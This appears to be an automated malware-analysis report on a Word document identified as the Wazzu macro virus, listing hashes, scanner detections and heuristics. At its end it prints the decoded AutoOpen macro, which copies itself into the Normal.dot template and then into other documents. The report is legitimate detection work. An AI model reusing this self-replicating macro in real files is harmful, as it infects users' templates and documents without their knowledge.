Wazzu — Office (OLE) malware analysis

Static analysis result for SHA-256 9815991005b59d91…

MALICIOUS

Office (OLE)

27.0 KB Created: 2000-06-02 20:33:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: b421cd7df5fb0f9d6d1aac5e399ec29b SHA-1: ebb70764d748a998a545ebb00a9397733bc55512 SHA-256: 9815991005b59d918d25c7c3b81a02fa0a7894090f7fb4c5faeaa6497f1673d5
188 Risk Score

Malware Insights

Wazzu · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains legacy WordBasic macro code, specifically an AutoOpen macro, which is designed to copy itself to the Normal.dot template. This technique is indicative of malware aiming for persistence on the victim machine. The presence of legacy WordBasic macro markers and ClamAV detections for 'Doc.Trojan.Wazzu' strongly suggest the Wazzu family.

Heuristics 4

  • ClamAV: Doc.Trojan.Wazzu-47 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Wazzu-47
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "autoOpen"

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1166 bytes
SHA-256: 2e3906669d0a423e42aaee6d12e2804bba8646509b9b3c56ea9e17cd78eaeb22
Detection
ClamAV: Doc.Trojan.Wazzu-14
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "autoOpen"

Public Sub MAIN()
Dim TheSmallOne$
Dim TheBigOne$
Dim ThisOne$
   
    TheSmallOne$ = WordBasic.[FileName$]() + ":autoOpen"

    TheBigOne$ = "Global:autoOpen"
    ThisOne$ = UCase(WordBasic.[Right$](WordBasic.[MacroFileName$](WordBasic.[MacroName$](0)), 10))

    If ThisOne$ = "NORMAL.DOT" Then
        SmallFileAtt = GetAttr(WordBasic.[FileName$]())
        If SmallFileAtt >= 32 Then SmallFileAtt = SmallFileAtt - 32
        If SmallFileAtt >= 4 Then SmallFileAtt = SmallFileAtt - 4
        If SmallFileAtt >= 2 Then SmallFileAtt = SmallFileAtt - 2
        If SmallFileAtt = 0 Then
        
            WordBasic.MacroCopy TheBigOne$, TheSmallOne$
            WordBasic.FileSaveAs Format:=1
            WordBasic.SetDocumentDirty 0
        End If
    Else
        WordBasic.MacroCopy TheSmallOne$, TheBigOne$
    End If
    
End Sub

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True